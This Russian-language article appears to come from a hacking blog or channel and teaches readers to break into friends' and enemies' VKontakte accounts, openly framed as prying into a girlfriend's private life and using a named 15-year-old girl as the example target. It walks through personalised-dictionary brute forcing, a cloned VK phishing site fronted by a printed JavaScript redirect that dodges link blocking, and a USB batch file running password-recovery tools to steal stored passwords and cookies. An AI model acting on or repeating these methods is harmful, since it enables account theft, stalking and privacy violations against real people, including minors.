Взлом ВК

Как часто вы ловили себя на мысли о том, что узнать секреты своей подружки было бы неплохой идеей? Как часто хотелось ворваться в её личную жизнь, нагло распахнув двери интимного барьера?

Было? Да конечно было. Человеческая природа устроена так, что мы хотим знать всё обо всех. И против заложенных в нас рефлексов не попрёшь.

А где в 21 веке подавляющее число молодёжи хранит свои тайны в виде компрометирующих переписок и фоток? Очевидно, в такой небезызвестной социальной сети, как Вконтакте.

Многим эта социальная сеть уже давно стала вторым домом. Мы проводим часы напролёт, погружаясь в её бездну.

Звучит грустно. Но, к счастью, статья о другом.

Сегодня я научу вас взламывать страницы вк ваших друзей и неприятелей.

Разумеется, все представленные ниже способы не дают 100%-й гарантии того, что вы сумеете получить доступ к аккаунту, однако при правильном подходе процент успешного входа довольно высок.

Хватит слов, переходим к действиям. Погнали!

Брутфорс

Наверняка все вы слышали про такую штуку, как брутфорс. Тем, кто в танке, поясню - это метод, заключающийся в подборе пароля.

"Чувак, какой подбор пароля, 21 век на дворе!"

Спокойно.

Если вы считаете, что в наше время уже никто не ставит такие банальные пароли, как "123456" или "qwerty123321", то могу сказать, что вы ошибаетесь. Ставят, ещё как. В основном, конечно, это люди бальзаковского возраста, которым лень запоминать сложные комбинации, состоящие из больших и малых букв, спецсимволов и цифр. И вряд ли это именно те люди, которых мы хотим взломать.

Окей, а что, если использовать в качестве перебора не банальные пароли, а индивидуальный словарь?

Это такой словарь, в котором находятся все возможные пароли, образованные от нескольких фраз/слов, связанных с человеком.

Сейчас всё объясню.

В первую очередь, нам необходимо добыть максимальное количество информации о человеке - его номер телефона, ФИО, возраст, увлечения. Для этого можете воспользоваться моей статьёй, размещённой на этом канале под названием "Пробив от А до Я".

Далее создаём словарь, в который добавляем все известные нам данные. 1 переменная - 1 строка.

Например, нашу жертву зовут Панкратова Анастасия Сергеевна, ей 15, и это всё, что мы о ней знаем. Создаём словарь:

Pankratova

Anastasia

Nastya

Sergeevna

15

Далее необходимо создать скрипт, который скомбинировал бы все эти переменные самыми разнообразными способами.

Для начала установим среду разработки под названием Python (как это сделать, а также как запустить представленный ниже скрипт, думаю, поймёте. Гуглить ведь все умеют?).

Пишем скрипт:

https://note-pad.net/ru/read/d5c24e9dbfa6748951c00d52063b4900

На выходе вы получите файл, содержащий в себе тысячи строк со всевозможными паролями.

Далее нам нужна программа, которая за нас будет осуществлять процесс подбора. Пользуемся.

https://note-pad.net/ru/read/fa25fc6d2a0c950e82e0a56152015ee3

Фишинг

Этот способ гораздо действеннее, и именно он сейчас является основным у злоумышленников, крадущих аккаунты вк. В чем его суть?

Мы создаём сайт, полностью идентичный интерфейсу вк. Далее пишем нашей жертве с фейкового аккаунта что-то вроде: "Вау, это твоя фотка?" с ссылкой на наш сайт. Перейдя по ней, жертва столкнется с формой ввода логина и пароля, и если она не имеет привычки смотреть на адрес сайта - то введёт их, не подозревая ни о чем. А данные прилетят вам.

Перейдём к реализации.

Что нам нужно? Фишинговый сайт и хостинг.

В первую очередь, качаем сайт (https://www.sendspace.com/file/1j1mti).

Далее заливаем его на хостинг, подключив к нему домен (Кто не знает, как это сделать - Гугл в помощь).

Потом регистрируем аккаунт на Ucoz.

Заходим в панель управления - Дизайн - Редактор - Страницы сайта и под тегом head вставляем скрипт:

<script type="text/javascript">  

 location.replace("http://сайт куда отправить");  

 </script>

Этот скрипт автоматически перенаправляет пользователя с нашего ucoz сайта на фишинг сайт.

Зачем это нужно? Чтобы вк не блокировал пользователю переход по подозрительной ссылке.

Вот и все. В конце, используя свою фантазию и красноречие, заставляем нашу жертву перейти по ссылке и ввести логин и пароль.

Кража пароля физически

Нет, нам не придется привязывать жертву к столбу, требуя предоставить нам пароль. Способ намного гуманней.

Если у вас есть возможность на 10-15 секунд засунуть в компьютер человека, которого вы хотите взломать, флешку - то считайте, что все его данные у вас в кармане.

Приступим к реализации.

Для начала нам понадобится флешка. Самая обычная флешка.

Далее качаем все программы из этого списка:

MessenPass

Mail PassView

Protected Storage PassView

Dialupass

BulletsPassView

Network Password Recovery

SniffPass Password Sniffer

RouterPassView

PstPassword

WebBrowserPassView

WirelessKeyView

Remote Desktop PassView

VNCPassView

Потом открываем блокнот, и вставляем код:

https://note-pad.net/ru/read/9806e252f5022ef204c7dfc60a7c6036

Сохранив блокнот как backup.bat, переносим его на флешку.

Вот и все. Теперь, как только вы вставите в чужой компьютер эту флешку и запустите backup.bat - все пароли, куки и т.д сохранятся в вашем txt - файле.

Итог

Обладая достаточными навыками социальной инженерии, вкупе с небольшими техническими знаниями, возможно всё. В том числе и возможно взломать аккаунт любого человека.